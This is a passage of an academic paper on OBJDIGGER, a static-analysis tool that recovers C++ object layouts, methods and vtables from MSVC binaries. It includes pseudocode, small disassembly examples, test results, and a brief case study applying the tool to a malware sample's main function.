Our approach consists of a preliminary stage followed by iterative analysis passes. We begin by disassembling binaries using the ROSE framework, and use data- and control-flow analysis to build the Use, Def, DepOn, and DepOf maps. These data structures are then used to identify object-oriented structures. ROSE provides the x86 instruction semantics and symbolic emulation infrastructure required for this analysis.

The key idea behind identifying OO structures is to track the propagation of unique (up to allocation site) ThisPtr instances within and between functions. We begin by identifying the set of functions (FM) that possibly follow the __thiscall convention. Next, using heuristics about known heap-allocation functions, such as the new() operator, and about stack-allocation patterns, we identify points at which a ThisPtr is created. We track these pointers to functions in FM using inter-procedural data-flow analysis. Depending on data-flow order, we mark methods as either constructors or member/inherited functions. Within these functions, we look for data transfers to and from memory addresses based off of the ThisPtr. Depending on the offsets from the ThisPtr and the size of the dereferences, we recover the size and position of data members. OBJDIGGER uses the ROSE framework to perform control-flow and dominator analysis.

5.1 Data and Control Flow Analysis
To construct the four maps described above, we implemented the well-known work-list algorithm [3, 10, 12] for data-flow analysis. Our algorithm is shown in Procedure buildDependencies(). It maintains a list of symbolic expressions (called states) that capture the contents of registers and memory after each basic block2 is executed.
For each basic block B, and for each instruction i of B in flow order, the algorithm: (i) symbolically executes i; (ii) updates the register and memory contents of B's state with the result r; and (iii) adds i to the list of "modifiers" of r. This list records the addresses of all instructions that have contributed to the value up to this point. For example, processing the instruction add [eax], 5, located at address 0x00405630, adds 5 to the symbolic value stored at the address pointed to by EAX and appends 0x00405630 to that value's list of modifiers. When a different instruction reading this same memory location (e.g., cmp [eax], 0) is processed later, a dependency relationship with the add is established by reading the list of modifiers.

The state of each basic block, before any instructions are executed, is composed of the 'merged' states of the block's predecessors. In more detail, if control flow can reach a basic block from multiple locations, the contents of registers and memory at block entry may have different symbolic values and modifiers, depending on the specific path taken. The merged state therefore combines the information from each possible entry path by performing a union across all possible entry states. Explicitly, if the contents of a register or memory location are the same in two different entry states, the symbolic value for that location in the merged state is the same. If they differ, the merged state records that the value is unknown, and the resulting list of modifiers is the combination of the lists from each entry state.

The state of each basic block, after all instructions are executed, is compared with its previous state in states. If any of the register or memory contents have changed, states is updated and all of the block's successors (those that the block can flow into) are marked for processing. The algorithm terminates when the states of all blocks stop changing.
5.2 Identifying __thiscall Functions
Most methods follow the __thiscall calling convention. When identifying data members and inheritance, we restrict ourselves to such functions, and thus our first step is to identify them. Note that the steps outlined here are not precise enough to distinguish between __thiscall and some instances of __fastcall [5] (a more complete algorithm would also need to verify that EDX is not being used to pass parameters). However, this is a cheap way to eliminate from further analysis many functions that cannot be methods, thereby improving the overall efficiency of our approach.

A key trait of __thiscall in MSVC is that the ThisPtr is passed as a parameter in the ECX register.3 Exploiting this feature, we find __thiscall methods as follows: we examine each function in the binary, f ∈ F, and look for those that contain instructions that use ECX whose value has been defined externally to the function. That is, we examine DepOn and look for an instruction, i, that maps to a tuple ⟨∗, ECX, j⟩, where j is an instruction that belongs to a different function than i, and '∗' matches an arbitrary value. Therefore, the set of methods following __thiscall is:

FM ← { f | ∃i ∈ f, ∃j ∉ f : ⟨∗, ECX, j⟩ ∈ DepOn(i) }

Our algorithm for identifying __thiscall methods is shown in Procedure findThisCall(). It generates a set of pairs, each containing a __thiscall method and the first instruction within that method to read ECX. In the rest of this paper, by a __thiscall method we mean a method identified by findThisCall().

2 A sequence of instructions with one entry and one exit.
3 http://msdn.microsoft.com/library/ek8tkfbw(v=vs.80).aspx

Procedure buildDependencies()
Input: Func : a binary function composed of assembly instructions
Input: EntryState : symbolic state of the system, storing register and memory contents, upon function entry
Result: Uses, Defs, DepsOn, and DepsOf are populated for each instruction
1   foreach block ∈ getBasicBlocks(Func) do
2       states[block] ← initSymbolicState();
3       queue[block] ← true;
4   changed ← true;
5   while changed do
6       foreach block ∈ getBasicBlocks(Func) do
7           if queue[block] then
8               if isFirstBlock(block) then
9                   curstate ← EntryState;
10              else
11                  foreach pred ∈ getPredecessorBlocks(block) do
12                      curstate ← mergeStates(curstate, states[pred]);
13              foreach instr ∈ getInstructions(block) do
14                  curstate ← symbolicExec(instr, curstate);
15                  foreach aloc ∈ getRegsAndMemRead(instr) do
16                      symval ← getRegOrMemValue(aloc, curstate);
17                      Uses[instr] ← ⟨symval, aloc⟩;
18                      foreach definer ∈ getModifierList(symval) do
19                          DepsOn[instr] ← ⟨symval, aloc, definer⟩;
20                          DepsOf[definer] ← ⟨symval, aloc, instr⟩;
21                  foreach aloc ∈ getRegsAndMemWritten(instr) do
22                      symval ← getRegOrMemValue(aloc, curstate);
23                      Defs[instr] ← ⟨symval, aloc⟩;
24              if not regsAndMemEqual(curstate, states[block]) then
25                  changed ← true;
26                  foreach successor ∈ getSuccessorBlocks(block) do
27                      queue[successor] ← true;
28              states[block] ← curstate;
29              queue[block] ← false;

Procedure findThisCall()
Input: Funcs : set of functions from the executable
Input: DepsOn : the dependent-on map
Result: ThisCalls : set of pairs ⟨func, instr⟩, where func follows __thiscall and instr is the first instruction in func that reads ECX
1   ThisCalls ← nil;
2   foreach func ∈ Funcs do
3       foreach instr ∈ getInstructions(func) do
4           foreach ⟨value, aloc, depinst⟩ ∈ DepsOn[instr] do
5               deffunc ← getFunction(depinst);
6               if aloc = ECX and func ≠ deffunc then
7                   ThisCalls ← ThisCalls ∪ ⟨func, instr⟩;
8                   Repeat at Line 2;
9   return ThisCalls

5.3 Identifying Object Instances and Methods
Once potential __thiscall methods have been identified, the next step is to group them into object instances by finding those that share a common ThisPtr. Recall that the ThisPtr is a reference to an object instance. Object-oriented methods are passed these pointers so that they know which object instance they are operating on, and they use the pointers to obtain member values and identify virtual methods.
Therefore, we first identify a potential ThisPtr, which points to the stack or the heap. Next, from the data structures constructed earlier in buildDependencies(), we look for the object-oriented methods that have been passed this particular pointer in ECX.

Identifying ThisPtr creation follows a similar pattern for both the stack and the heap. Heap space is obtained using functions such as MSVC's new() operator. Stack space is allocated upon function invocation in the function prologue.4 An lea instruction is often used subsequently to load references to portions of this space. In the remainder of this section, we describe how we track a heap-addressed ThisPtr to object-oriented methods. Tracking a stack-addressed ThisPtr is very similar, except that the process begins at an lea instruction.

We are able to identify calls to new(), either by parsing the binary's import section or from fingerprints/hashes of known5 new() implementations. Once a call to new() has been identified, we iterate through each __thiscall method and attempt to identify those that contain an instruction that uses new()'s returned value. To identify methods belonging to an object created on the heap, we do the following for each function that calls new():

1. We retrieve the ThisPtr by identifying the first instruction, j, that reads EAX after the call to new().6 The symbolic value of the ThisPtr is found from Use(j), corresponding to the pair ⟨thisPtrFromNew, EAX⟩. See Procedure findReturnValueOfNew().

2. We then iterate through each __thiscall method called in the same function that calls new(), looking for those that contain an instruction, i, that reads ECX with a matching value.

Simply stated, we look for __thiscall methods that are passed values of ECX that match the symbolic value in EAX immediately following a call to new(). More formally:

objectMethods = { f ∈ FM | ∃i ∈ f : ⟨thisPtrFromNew, ECX⟩ ∈ Use(i) }

where f is a __thiscall method, i is an instruction in f, and thisPtrFromNew is defined above. Also see Procedure findObjectMethodsFromNew().

4 Typically push ebp; mov ebp, esp; sub esp, X, where X is the number of bytes allocated in the current stack frame.
5 We hash the bytes of unique new() implementations across different versions of the Visual Studio compiler and attempt to identify functions that match these signatures within a binary.
6 Functions such as new() typically return their result in the register EAX.

0x401008: call new
0x40100D: mov [ebp-4], eax
0x401010: mov ecx, [ebp-4]
0x401021: call constructor
0x401024: ...
0x401026: push param1_offset
0x40102D: push param2_offset
0x401030: mov ecx, [ebp-4]
0x401033: call method
Figure 5. Heap object construction and method call example.

Fig. 5 illustrates these concepts. The call to new() at 0x401008 allocates space on the heap. The ThisPtr, referring to this region, is returned in EAX, and the instruction at 0x40100D saves it into a temporary variable. This ThisPtr is then transferred to the ECX register prior to the constructor call at 0x401021 and the method call at 0x401033. Since constructor and method share a ThisPtr, they are methods belonging to the same class.
Procedure findReturnValueOfNew()
Input: NewCaller : a function that calls new()
Input: NewAddresses : set of addresses of new() functions
Input: Uses : the Uses map built by buildDependencies()
Result: ThisPtr : the symbolic value returned by a new() call
1   found ← false;
2   foreach instr ∈ getInstructions(NewCaller) do
3       if found = false then
4           if getInstructionType(instr) = x86_call then
5               if getCallDest(instr) ∈ NewAddresses then
6                   found ← true;   // found the call to new
7       else
8           foreach ⟨ThisPtr, aloc⟩ ∈ Uses[instr] do
9               if aloc = EAX then
10                  return ThisPtr; // return the symbolic value
11  return failure;                 // not usually reached

In a similar fashion, we identify objects created on the stack by identifying lea instructions, l, that reference locally allocated stack space. The value of the ThisPtr is found from the pair ⟨thisPtr, REG⟩ ∈ Def(l), where REG is the first operand of the lea instruction. The pointer is tracked to __thiscall methods in the same way as on the heap.

Identifying which methods are likely constructors is complicated by several factors. Constructors are required to return a ThisPtr, which distinguishes them from many, but not all, conventional methods. If the class uses virtual functions, initialization of the virtual function table pointers can be used to reliably identify constructors, but virtual functions are not present in all classes.

Procedure findObjectMethodsFromNew()
Input: NewCaller : a function that calls new()
Input: ThisCalls : set of functions from findThisCall()
Input: Uses : the Uses map built by buildDependencies()
Result: ObjectMethods : set of functions sharing a common ThisPtr
1   ObjectMethods ← nil;
2   thisptr ← findReturnValueOfNew(NewCaller);
    // Get the list of OO calls from this function
3   OurCalls ← ThisCalls ∩ getCalls(NewCaller);
4   foreach ⟨func, instr⟩ ∈ OurCalls do
5       foreach ⟨symval, aloc⟩ ∈ Uses[instr] do
6           if aloc = ECX and symval = thisptr then
7               ObjectMethods ← ObjectMethods ∪ func;
8   return ObjectMethods
Another common heuristic is that constructors are always called first after space is allocated for the object. This heuristic fails when compiler optimization has resulted in the constructor being inlined following the allocation. We chose to identify a constructor as the first method called following allocation of the object, provided that it returns the same ThisPtr that was passed as a parameter. This algorithm erroneously identifies some functions as constructors; for example, builder/factory methods can closely resemble constructors at the binary level. However, because these types of methods may be indistinguishable from constructors in the binary, we have not counted this as an error. The heuristic also misses some legitimate constructors, for example constructors that construct other types of objects.

5.4 Data Members
Once related __thiscall methods have been associated with unique object instances, we process each one to retrieve data members. Recall that the ThisPtr points into the memory region allocated for an object. Therefore, by finding memory dereferences that use the ThisPtr, and extracting their offsets into this region and their sizes, we identify the location and width of each data member in the class layout.

Specifically, we identify the first instruction, j, in the function to read ECX. We retrieve the value of the ThisPtr from the pair ⟨thisPtr, ECX⟩ ∈ Use(j). We then iterate through all of the other instructions, i, that dereference memory, looking for a pair ⟨∗, thisPtr + offset⟩ ∈ Use(i). The algorithm is given more formally in Procedure findDataMembers(), which produces a mapping, MemberMap, between a __thiscall method and a set of data members, each represented by the pair ⟨offset, size⟩.

Fig. 6 illustrates the use of the ThisPtr for accessing a data member. The ThisPtr is moved from ECX to EAX at 0x401104 and 0x401107. The data variable located at memory address ThisPtr plus 0xC is transferred to EAX at 0x40110A.
Therefore, we determine that there is a data member at offset twelve in this class's layout. Since the size of the dereference is 32 bits, we can assume that a variable of at least that size exists at that particular offset.

0x401100: push ebp
0x401101: mov ebp, esp
0x401103: push ecx
0x401104: mov [ebp-4], ecx
0x401107: mov eax, [ebp-4]
0x40110A: mov eax, [eax+0Ch]
0x40110D: add eax, 1
0x401110: mov esp, ebp
0x401112: pop ebp
0x401113: retn
Figure 6. Data member discovery example.

Procedure findDataMembers()
Input: ThisCalls : set of functions from findThisCall()
Input: Uses : the Uses map built by buildDependencies()
Result: MemberMap : mapping from functions to pairs ⟨offset, size⟩ describing data members
1   MemberMap ← nil;
2   foreach ⟨func, instr⟩ ∈ ThisCalls do
3       members ← nil;
4       foreach ⟨thisptr, aloc⟩ ∈ Uses[instr] do
5           if aloc = ECX then
6               foreach uinstr ∈ getInstructions(func) do
7                   if instr ≠ uinstr then
8                       ⟨symval, ualoc⟩ ← Uses[uinstr];
9                       if isMemReadType(ualoc) then
10                          offset ← thisptr − symval;
11                          if isConstant(offset) then
12                              size ← getReadSize(uinstr, ualoc);
13                              members ← members ∪ ⟨offset, size⟩;
14              break;  // done with this function
15      MemberMap[func] ← members;
16  return MemberMap

5.5 Virtual Function Tables
Objects that have virtual function tables initialize the memory at the ThisPtr (zero offset) with the address of the table. This memory write occurs within a constructor and typically takes the form mov [reg], vtableAddr, where reg contains the value of a ThisPtr. Therefore, if we find such an instruction, i, within a previously identified constructor, we record the written constant as a potential virtual function table address (i.e., ⟨vtableAddr, thisPtr⟩ ∈ Def(i)). We then identify calls made to entries within this table by examining the dependents of the mov instruction, i. In more detail, we find the set of instructions, Q:

Q = { q | ⟨vtableAddr, thisPtr, q⟩ ∈ DepOf(i) }

where Q contains the set of instructions that read the ThisPtr from the address initialized by the mov instruction.
Using symbolic execution, we follow the flow of the pointer from this instruction to a call instruction. We record the branch target and the offset of the call destination from the ThisPtr as an entry at the given offset within the virtual table.

5.6 Inheritance and Embedded Objects
Although our current implementation does not fully support inheritance detection, we describe our progress in this area.

Inheritance relationships can be determined by analyzing constructors. When a class inherits from a parent, the constructors of the subclass call the parent's constructors. Specifically, the subclass passes its ThisPtr to the parents' constructors. In the case of single inheritance, the subclass constructor passes the ThisPtr directly (the memory address is exactly equal to the ThisPtr, with no offset). In the case of multiple inheritance, the subclass passes the pointer plus the offset at which the parent is located in the class layout.

Unfortunately, this behavior is also observed when an object contains embedded objects. Therefore, in order to distinguish between embedded objects and inheritance, we need additional discriminators. One reliable method would be to check whether the subclass overwrites the virtual table address of its parent in its constructors; as mentioned earlier, however, classes in general, and the parent class in this case, are not required to contain virtual functions.

In summary, to identify inheritance relationships, we could: (1) retrieve all cross-references (calls out of the function) from constructors to other constructors; (2) compare the values of ECX at the beginning of each function: a constructor that calls other constructors sharing a common ECX value (possibly plus some constant) indicates either an inheritance relationship or an embedded object; and (3) check whether the caller overwrites the address passed to the called constructors.
Recall that the pointer to the virtual table is typically located at offset zero within a class layout. Therefore, if a constructor writes a pointer to a new virtual table into a memory address that corresponds to a ThisPtr passed to another constructor, we can label the other constructor as a parent. If we cannot find such an overwrite, it is possible that the constructor is instantiating an embedded object within the class. See Procedure lookForInheritance().

0x401104: mov [ebp-4], ecx
0x401107: mov ecx, [ebp-4]
0x40110A: call sub_4010C0
0x40110F: mov ecx, [ebp-4]
0x401112: add ecx, 10h
0x401115: call sub_401080
0x40111A: mov eax, [ebp-4]
0x40111D: mov dword ptr [eax], 0x40816C
0x401123: mov ecx, [ebp-4]
0x401126: mov dword ptr [ecx+10h], 0x40817C
Figure 7. Example constructor with multiple inheritance.

Fig. 7 shows part of a constructor that calls two other constructors, at 0x4010C0 and 0x401080. It passes its ThisPtr without any offset to the first call at 0x401107, and passes the ThisPtr plus 0x10 to the second call at 0x401112. At 0x40111D and 0x401126, we observe that these same memory locations are overwritten with constants corresponding to two new virtual function table addresses. Therefore, we know that this class inherits from two parents, whose constructors are at 0x4010C0 and 0x401080 and whose layouts are embedded at offsets zero and sixteen of the class (see Fig. 2 for an example of single inheritance and layout embedding).

In summary, there is an open problem in reliably distinguishing between embedded objects and multiple inheritance in the absence of virtual functions in the parent. Some of our remaining deficiencies stem from this difficulty, and we plan to continue investigating this problem in future work.

5.7 Object Instance Aggregation and Reporting
Our implementation aggregates data from object instances created throughout a binary.
This information is grouped by unique con- structor, and in some cases builder methods that return object in- stances that are largely indistinguishable from constructors. TheProcedure lookForInheritance() Input :Func : function identified as a constructor, member of ThisCalls Input :Constructors : the set of all identified constructors Input :ThisCalls : set of functions from findThisCall() Input :Uses : the Uses map built by buildDependencies() Input :Defs : the Defs map built by buildDependencies() Result :Parents : set of parent/inherited constructors called byFunc 1Parents←nil; 2passed←nil; 3foreachinstr∈getInstructions( Func)do // Find calls to other constructors 4ifgetInstructionType( instr)=x86_call then 5target←getCallDest( instr); 6 iftarget∈Constructors then // Get ThisPtr passed to each constructor 7 foreach⟨cxf,cxi⟩∈ThisCalls do 8 iftarget =cxfthen 9 foreach⟨symval ,aloc⟩∈Uses[cxi]do 10 ifaloc=ECX then 11 passed←passed∪⟨cxf,symval⟩; // Look for mov instruction that overwrites location of a passed ThisPtr 12foreachinstr∈getInstructions( Func)do 13ifgetInstructionType( instr)=x86_mov then 14 foreach⟨symval ,aloc⟩∈Defs[instr]do 15 ifisMemWriteType( aloc)then 16 foreach⟨pxf,thisptr⟩∈passed do 17 ifsymval =thisptr then 18 Parents←Parents∪pxf; 19returnParents ; list of all seen data members and methods associated with an ob- ject instance, produced by some constructor, are merged with that of another object instance, produced by the same constructor. In- formation from constructors known to belong to the same class, for example because they share a common virtual table, are also merged. In this way we provide results to the analyst which are more use- ful than individual object instances and yet are not truly class defi- nitions either. With more rigorous detection of inheritance and ob- ject embedding relationships these merged object instances should converge on complete class definitions although we do not claim that result in this work. Fig. 
8 shows data about merged object instances from one of our experiments. Note that the actual output of our tool reports raw addresses; for illustrative purposes here, we have substituted the raw addresses with symbol information obtained from the compiler-generated PDB files. This particular example shows correctly identified methods, members, and virtual function information for the class XmlText. However, it also illustrates a case in which our approach was unable to distinguish between an embedded object and an inheritance relationship. XmlText inherits from XmlNode; however, the XmlNode() and SetValue() methods of XmlNode were reported as methods of XmlText.

Constructor: __thiscall XmlText::XmlText(char *)
Vtable: 4b7264
Vtable Contents:
  Address: 4b7264 Pointer to Function @4035ae
Data Members:
  Offset: 16 Size: 4
  Offset: 20 Size: 4
  Offset: 24 Size: 4
  Offset: 28 Size: 4
  Offset: 36 Size: 4
  Offset: 40 Size: 4
  Offset: 44 Size: 1
Methods:
  void *__thiscall XmlText::XmlText()
  void __thiscall XmlNode::SetValue(char *)
  __thiscall XmlNode::XmlNode(XmlNode::NodeType)
  void *__thiscall XmlText::SetCDATA(bool)
Inherited methods:

Figure 8. Output of OBJDIGGER (with symbols substituted for addresses).

6. Experiments

To validate our approach, we conducted experiments on open-source packages, downloaded from SourceForge[7], and on real-world malware for which source is unavailable. We propose here a framework for evaluating such algorithms using a mixture of tool output, debugging information, and compiler-generated class member layouts.

6.1 Open-source Tests

6.1.1 Methodology

The open-source tests were designed to evaluate the effectiveness of our approach given ground truth. The packages that we used were: The Lean Mean C++ Option Parser version 1.3, Light Pop3/SMTP Library, X3C C++ Plugin Framework version 1.0.2, PicoHttpD Library version 1.2, and CImg Library version 1.0.5.
Each program serves a different purpose, such as XML or math parsing, and includes test programs that exercise different parts of their respective APIs. We ran our tool on a binary from each library. In these experiments, ground truth came from three sources: 1) a compiler layout produced by MSVC (as shown in Fig. 2) that contains information about the class layout and data members; 2) symbol information from compiler-generated PDB files, which allows us to map function addresses to symbolic names (from which we can determine the classes to which they belong); and 3) source code of the test programs and libraries.

The results of our experiments are summarized in Table 1. We collected data in three categories for each test package:

1. # of unique classes found / # of unique classes. Using the symbol information from the PDB, we counted the number of unique classes instantiated in the binary code. We excluded classes that were part of the standard compiler library. For the numerator, we counted those classes for which OBJDIGGER identified at least one instance of a constructor and associated methods and members.

2. # of methods found / # of methods in binary. We used the symbol information from the PDB to determine which methods were included in the binary. We counted a method as found by OBJDIGGER if it was associated with at least one instance of a constructor for the correct class. Note that inlined methods, and methods which were not included in the binary, are not present as symbols in the PDB file. We also excluded from the denominator cases where source code inspection confirmed that the methods were not in the control flow. This sometimes happens when the compiler includes functions only because they were part of an object file.

3. # of data members found / # of data members in binary. Using the compiler layout information, we compared the class members identified by OBJDIGGER to the members reported by the compiler.

[7] http://www.sourceforge.net
In certain circumstances we excluded from the denominator members that were known to have no uses in the binary. This sometimes occurs when the compiler excludes the only function which accesses a member because the method was never called.

Our testing methodology, for each package, was as follows:

1. Compile the test programs for the package. Generate layout information using the compiler and demangle class names using undname.

2. Run OBJDIGGER on each binary, which reports method addresses and object layouts, without names.

3. Extract symbol data from the PDB files using IDA Pro[8] and demangle names using undname[9]. This maps function addresses to method names.

4. Correlate the function addresses from the OBJDIGGER output to the names in the symbol data. As can be seen in Fig. 8, the symbolic names specify the classes that particular methods belong to, which allows us to determine the validity of grouped methods.

5. Compare the discovered data members to those reported by the compiler, using the class name obtained from the symbol for the constructor.

6. Manually inspect the source code of each test program, excluding any methods or members as described in the previous section.

Table 1. Test results for open-source packages.

Package            Classes        Methods        Members
PicoHttpD 1.2      8/9 (89%)      31/47 (66%)    18/25 (72%)
x3c 1.0.2          4/5 (80%)      21/24 (88%)    6/8 (75%)
CImg 1.0.5         7/7 (100%)     61/83 (73%)    33/42 (79%)
OptionParser       10/10 (100%)   37/52 (71%)    33/35 (94%)
Light Pop3/SMTP    8/9 (89%)      29/35 (83%)    16/23 (70%)

6.1.2 Discussion

Table 1 lists the recall, or true positive rate, for OBJDIGGER. Method and member totals are summed across all classes. While the table does not explicitly list precision values, there were no false positives generated for this test set using the tool, so precision was 100% in all tests.
In each case, we verified that all identified methods and data members were correctly associated with the classes to which they actually belong by looking up their symbolic names.

[8] https://www.hex-rays.com/products/ida/
[9] undname is an MSVC tool for demangling OO method names.

With regards to missed methods, OBJDIGGER was often able to identify many of them as following __thiscall, but was not able to associate them with a specific class. It was also able to group many of these missed methods with other found methods that shared the same ThisPtr; unfortunately, none of those other found methods could be positively identified as a constructor. For example, in the case of PicoHttpD, the single missed class was created as a global variable: a memory address for a location in the .rdata section was passed to the constructor. Currently, however, OBJDIGGER only checks for local stack addresses and space allocated by new(). Thus, even though OBJDIGGER correctly identified that this same pointer into .rdata was passed as a ThisPtr in a couple of other methods (those that we missed), we did not report a new class instance or any of these associated methods. We chose this conservative approach to avoid over-counting unique class instances. It is possible that these methods could have belonged to an object instance from a class that had already been identified, but created in another function.

When a constructor is not found, we are unable to associate any of the found members or methods in that object instance with a specific named class. This leads to a cascading effect where a single missed constructor negatively affects recall. Additionally, missed class methods also mean that any data members accessed inside of them were missed as well. This cascading effect is a fundamental challenge in analyzing OO code, since methods and data members are tied together to produce the object abstraction.
With regards to the missed methods and data members in CImg and Light Pop3, we suspect that these omissions were due to implementation bugs and not limitations of the approach. Specifically, at the time of the experiments, OBJDIGGER had problems tracking objects that were passed as parameters to other methods. The tool also had problems identifying certain methods that were called indirectly, by dereferencing addresses within a class's virtual table. We are currently working on addressing those issues.

A fundamental limitation of our approach is that we can only detect methods and members that are respectively called and accessed by the program being analyzed. Our technique relies on grouping methods together by shared ThisPtr. Thus, if a program creates a class with methods that are never called by any instance of that class (or associated with a unique constructor belonging to that class), OBJDIGGER fails to detect these methods. Similarly, if a data member is never accessed (i.e., OBJDIGGER never observes a memory read or write to a particular location within a class layout), OBJDIGGER fails to detect this particular data member.

6.2 Closed-source Malware Case Study

Object-oriented malware presents many challenges to analysts. Understanding object structures can be critical for recovering functionality. To demonstrate how OBJDIGGER can aid with malware analysis, we used it to help analyze a malware sample (file MD5 019d3b95b261a5828163c77530aaa72f on http://www.virustotal.com).

It is not uncommon for OO malware to encapsulate critical, malicious functionality in C++-style data structures. As a result, reverse engineering OO malware can be challenging because understanding program functionality may first require recovering C++ data structures. Manually recovering C++ data structures can be a tedious and error-prone task, especially if done piecewise or in conjunction with trying to understand program functionality.
OBJDIGGER automatically recovers object structures, thereby streamlining analysis efforts. For example, in the sample, OBJDIGGER quickly identifies object instances and potential constructors. Of the 585 functions within the sample, our tool identified nine object instances along with their constructors, methods, data members, and virtual function tables. The analyst can then inspect this reduced set to determine each data structure's relevance to the program.

0x401010 push 0FFFFFFFFh
0x401012 push 41497Bh
0x401017 mov eax, large fs:0
0x40101D push eax
0x40101E mov large fs:0, esp
0x401025 sub esp, 0A8h
0x40102B push esi
0x40102C lea ecx, [esp+4]
0x401030 call sub_403000
0x401035 mov eax, [esp+C0h]
0x40103C mov ecx, [esp+BCh]
0x401043 push eax
0x401044 push ecx
0x401045 lea ecx, [esp+Ch]
0x401049 mov dword ptr [esp+BCh], 0
0x401054 call sub_401470
0x401059 lea ecx, [esp+4]
0x40105D mov esi, eax
0x40105F mov dword ptr [esp+B4h], 0FFFFFFFFh
0x40106A call sub_401F20
0x40106F mov ecx, [esp+ACh]
0x401076 mov eax, esi
0x401078 pop esi
0x401079 mov large fs:0, ecx
0x401080 add esp, 0B4h
0x401086 retn

Figure 9. Main function of the malware sample.

Constructor: 403000
Vtable: 41647c
Vtable Contents:
  Address: 41647c Pointer to Function @ 403030
Data Members:
  Offset: 0x0 Size: 0x4
  Offset: 0x8 Size: 0x4
  Offset: 0x18 Size: 0x4
  ...
  Offset: 0xa0 Size: 0x4
  Offset: 0xa4 Size: 0x4
Methods:
  401470
  401f20

Figure 10. OBJDIGGER output for the malware sample main function.

Fig. 9 shows the disassembly for the main function, generated by IDA Pro. A cursory analysis of this function shows that it is a relatively simple routine containing three method calls: sub_403000, sub_401470, and sub_401f20. Note that in Fig. 10, OBJDIGGER identified all three of these methods as related to one object: sub_403000 is the constructor, and sub_401470 and sub_401f20 are class methods.
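A hedged source-level reading of Figs. 9 and 10 might look like the following. All names and method bodies here are invented placeholders (the real bodies are unknown), and the third call could equally be a destructor rather than an ordinary method.

```cpp
// Hypothetical reconstruction of the malware's main function: a
// stack-allocated object (lea ecx, [esp+4]), one constructor call,
// then two calls on the same ThisPtr, returning the first method's
// result (saved in esi, returned in eax).
struct Unknown {
    Unknown() {}                              // sub_403000
    virtual void on_event() {}                // vtable slot @403030 (placeholder)
    int run(int a, int b) { return a + b; }   // sub_401470 (placeholder body)
    void cleanup() {}                         // sub_401F20, or a destructor
};

int main_reconstructed() {
    Unknown obj;                 // call sub_403000 with ecx = &obj
    int result = obj.run(1, 2);  // call sub_401470: two stack args + ecx
    obj.cleanup();               // call sub_401F20 on the same object
    return result;               // mov eax, esi; retn
}
```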
With this information, the analyst immediately has a sense that the malware's functionality is organized around (at least) one object instantiated in the main function. Because significant parts of the program are encapsulated in this object, understanding its internals is likely critical to determining program functionality. For instance, understanding the purpose of this object's data members takes on greater importance because of the object's usage in the malware. Notably, OBJDIGGER also provides information on class member offsets and sizes, further simplifying analytical efforts.

In this scenario, the information provided by OBJDIGGER could be recovered manually, but this may take considerable effort. Automatically reasoning through C++ data structures saves time and frees the analyst to focus on questions that are more relevant to malware functionality.

7. Related Work

Sabanal et al. [18] provide a detailed discussion of recovering C++ data structures from binary code. In particular, they are the first to describe heuristics for recognizing C++ objects by monitoring the use of the ThisPtr in binary methods. Our work builds upon their ideas, and captures these heuristics as machine-recognizable data-flow patterns. Additionally, our work goes one step further by tracking the propagation of the ThisPtr between functions to identify common data members and methods of classes. Tröger and Cifuentes [21] pioneered a similar use of data-flow analysis techniques applied to binaries to recover virtual function tables; however, their work relied on dynamic execution of code to resolve the addresses of object methods. Lee et al. [13], Balakrishnan and Reps [2], and Ramalingam et al. [16] focus on variable and data type recovery in executable files. While type recovery is an important and related problem, our primary concern is to recover the class structure of objects. Srinivasan et
al. [20] propose a method that uses dynamic analysis to observe call relationships between methods to infer class hierarchy (similar to what we have done in a static context). However, their ability to recover class structure is limited to the portions of a binary that actually run. Furthermore, since they do not track memory dereferences that use the ThisPtr, they do not recover data members. Slowinska et al. [19] and Lin et al. [14] focus on type discovery of variables using dynamic analysis. Although their work does not deal with object-oriented code directly, their method of tracking the use of memory locations to infer size and type is similar to the way we track memory dereferences involving the ThisPtr to infer the size and offset of data members.

Adamantiadis [1] provides a detailed explanation of constructors, destructors, and virtual function tables at the binary level, and gives an example of reverse engineering an object-oriented C++ binary. However, the discussion does not propose an automated technique.

Dewey et al. [4] describe many techniques similar to the ones we use in our work. They specifically state, though, that they are focused on analyzing known non-malicious code for a specific class of vulnerability. Our work is designed to be used explicitly for analyzing malicious software.

Fokin et al. [7] adopt an approach that appears to be very similar to ours, but provide less detail about the data-flow analysis. Their earlier work [6] provides interesting insights about the aggregation of related object instances into classes.

8. Conclusion and Future Work

In this paper, we present a purely static approach for recovering object instances, data members, and methods from x86 binaries compiled using MSVC. We produced a tool, OBJDIGGER, which we tested against open-source software and real-world malware.
A comparison of the output from the open-source tests against ground truth, generated from the compiler's debug information, indicates that our technique can achieve its goal effectively. The tests against real-world malware demonstrate that our tool can aid in the malware reverse engineering process.

While our experiments demonstrate that our approach is viable, there is room for improvement. First, OBJDIGGER needs to be extended to recognize and recover objects instantiated at global scope. We are currently exploring this direction, building on data-flow analysis techniques to reason through the mechanics of global object creation and storage.

In certain object arrangements, inheritance and composition are hard to distinguish. Determining whether an embedded object is a parent or a member without relying on the presence of virtual function tables is an open problem, and more work is needed to correctly identify this arrangement. Similarly, constructors and destructors can be difficult to distinguish under certain circumstances. OBJDIGGER needs to be extended to accurately identify destructors to enable better identification and tracking of object scope.

Advanced OO features of C++, such as virtual inheritance, are currently not supported. Virtual inheritance fundamentally changes the layout of objects in memory. The primary mechanism used to implement virtual inheritance is the virtual base class table, which maintains offsets to multiple parent classes to remove the ambiguity possible with multiple inheritance. OBJDIGGER must be extended to correctly recognize and interpret these tables.

Further investigation is needed to fully understand the implications of compiler optimizations such as inlining of constructors, destructors, and other methods.

Finally, further experimentation is needed to determine to what extent OBJDIGGER can analyze non-MSVC-generated binaries.
Preliminary analysis suggests that compilers such as the GNU C++ Compiler use similar mechanisms to implement OO C++ features, but additional investigation is needed to determine what nuances, if any, exist in different compilers. It might also be interesting to investigate what we can discover of OO patterns in other languages, such as Delphi, which analysts see frequently in the malware realm.

On a more practical note, the output of OBJDIGGER can certainly be improved to help the analyst more quickly see relationships between methods and objects (perhaps as a custom plugin for IDA Pro).

Acknowledgments

This material is based upon work funded and supported by the Department of Defense under Contract No. FA8721-05-C-0003 with Carnegie Mellon University for the operation of the Software Engineering Institute, a federally funded research and development center. This material has been approved for public release and unlimited distribution. Carnegie Mellon®, CERT®, and CERT Coordination Center® are registered in the U.S. Patent and Trademark Office by Carnegie Mellon University. DM-0000440

References

[1] Aris Adamantiadis. Reversing C++ programs with IDA Pro and Hex-Rays. http://blog.0xbadc0de.be/archives/67.

[2] Gogul Balakrishnan and Thomas Reps. DIVINE: discovering variables in executables. In Proceedings of the 8th International Conference on Verification, Model Checking, and Abstract Interpretation (VMCAI'07), pages 1–28, Berlin, Heidelberg, 2007. Springer-Verlag.

